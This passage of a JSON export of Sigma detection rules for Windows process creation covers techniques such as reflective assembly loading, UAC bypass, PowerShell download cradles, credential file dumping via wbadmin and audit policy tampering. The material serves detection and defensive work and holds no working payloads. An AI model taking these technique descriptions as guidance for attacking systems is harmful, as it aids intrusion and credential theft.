"7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "value": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd" }, { "description": "Detects base64 encoded .NET reflective loading of Assembly", "meta": { "author": "Christian Burkard (Nextron Systems), pH-T (Nextron 
Systems)", "creation_date": "2022-03-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027", "attack.t1620" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "value": "PowerShell Base64 Encoded Reflective Assembly Load" }, { "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_certify.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Certify", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": 
"7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "762f2482-ff21-4970-8939-0aa317a886bb", "value": "HackTool - Certify Execution" }, { "description": "Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bginfo_suspicious_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "811f459f-9231-45d4-959a-0266c6311987", "value": "Suspicious Child Process Of BgInfo.EXE" }, { "description": "Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.\nThis detection also focuses on any uncommon child processes spawned from \"Wlrmdr.exe\" 
as a supplement for those that possess \"ParentImage\" telemetry.\n", "meta": { "author": "frack113, manasmbellani", "creation_date": "2022-02-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wlrmdr_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/", "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "value": "Wlrmdr.EXE Uncommon Argument Or Child Process" }, { "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ShadowChasing1/status/1552595370961944576", "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "value": "Suspicious File Execution From Internet Hosted WebDav Share" }, { "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", "meta": { "author": "frack113", "creation_date": "2022-02-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_tor_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "value": "Tor Client/Browser Execution" }, { "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by 
selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "creation_date": "2021-02-02", "falsepositive": [ "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "filename": "proc_creation_win_auditpol_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", "value": "Audit Policy Tampering Via Auditpol" }, { "description": "Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_provlaunch_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "value": "Potential Provlaunch.EXE Binary Proxy Execution Abuse" }, { "description": "Detects a copy command or a copy utility execution to or from an Admin share or remote", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "creation_date": "2019-12-30", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_copy_lateral_movement.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1211636381086339073", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.collection", "attack.exfiltration", "attack.t1039", "attack.t1048", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "value": "Copy From Or To Admin Share Or Sysvol Folder" }, { "description": "Detects the execution of the LOLBIN gpscript, which executes 
logon or startup scripts configured in Group Policy", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Legitimate uses of logon scripts distributed via group policy" ], "filename": "proc_creation_win_lolbin_gpscript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e59c230-6670-45bf-83b0-98903780607e", "value": "Gpscript Execution" }, { "description": "Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.", "meta": { "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Legitimate DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized." 
], "filename": "proc_creation_win_odbcconf_register_dll_regsvr.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/raspberry-robin/", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "value": "New DLL Registered Via Odbcconf.EXE" }, { "description": "Detects the execution of certutil with the \"exportPFX\" flag which allows the utility to export certificates.", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "There are legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" ], "filename": "proc_creation_win_certutil_export_pfx.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "value": "Certificate Exported Via Certutil.EXE" }, { "description": "Detects usage of Gpg4win to encrypt files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_encryption.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" ], "tags": [ "attack.execution" ] }, "uuid": "550bbb84-ce5d-4e61-84ad-e590f0024dcd", "value": "File Encryption Using Gpg4win" }, { "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_dism_remove.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_remove.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", "value": "Dism Remove Online Package" }, { "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_restore_sensitive_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup", "https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", "https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml", 
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84972c80-251c-4c3a-9079-4f00aad93938", "value": "Sensitive File Recovery From Backup Via Wbadmin.EXE" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", "value": "Root Certificate Installed From Susp Locations" }, { "description": "Detects WmiPrvSE spawning a process", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-15", "falsepositive": [ "False positives are expected (e.g. 
in environments where WinRM is used legitimately)" ], "filename": "proc_creation_win_wmiprvse_spawning_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "value": "WmiPrvSE Spawned A Process" }, { "description": "Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\nWindows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.\n", "meta": { "author": "@Kostastsale, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.nettitude.com/blog/introducing-sharpwsus/", "https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1", "https://github.com/nettitude/SharpWSUS", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1210" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"b0ce780f-10bd-496d-9067-066d23dc3aa5", "value": "HackTool - SharpWSUS/WSUSpendu Execution" }, { "description": "Detects the execution of rundll32 with a command line that doesn't contain a common extension", "meta": { "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou", "creation_date": "2022-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_uncommon_dll_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1481630810495139841?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "value": "Rundll32 Execution With Uncommon DLL Extension" }, { "description": "Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".", "meta": { "author": "Mateusz Wydra, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Legitimate, non-default assistive technology applications execution" ], "filename": "proc_creation_win_atbroker_uncommon_ats_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "value": "Uncommon Assistive Technology Applications Execution Via AtBroker.EXE" }, { "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", "value": "UAC Bypass Using Disk Cleanup" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_dir_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "value": "AddinUtil.EXE Execution From Uncommon Directory" }, { "description": "Detects events that appear when a user clicks on a link file with a powershell command in it", "meta": { "author": "frack113", "creation_date": "2022-02-06", "falsepositive": [ "Legitimate commands in .lnk files" ], "filename": "proc_creation_win_susp_embed_exe_lnk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.x86matthew.com/view_post?id=embed_exe_lnk", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "value": "Hidden Powershell in Link File Pattern" }, { "description": "Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redmimicry.com/posts/redmimicry-winnti/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1106", "attack.t1059.003", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "value": "HackTool - RedMimicry Winnti Playbook Execution" }, { "description": "Detects suspicious ways to download files or content using PowerShell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Scripts or tools that download files" ], "filename": "proc_creation_win_powershell_download_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", "value": "PowerShell Web Download" }, { "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Google Drive", "Citrix" ], "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Gal_B1t/status/1062971006078345217", 
"https://twitter.com/hexacorn/status/1448037865435320323", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "value": "Potential Command Line Path Traversal Evasion Attempt" }, { "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely (at.exe deprecated as of Windows 8)" ], "filename": "proc_creation_win_at_interactive_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "value": "Interactive AT Job" }, { "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_defendercheck.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/matterpreter/DefenderCheck", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.005" ] }, "related": [ { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "value": "PUA - DefenderCheck Execution" }, { "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", "meta": { "author": "Markus 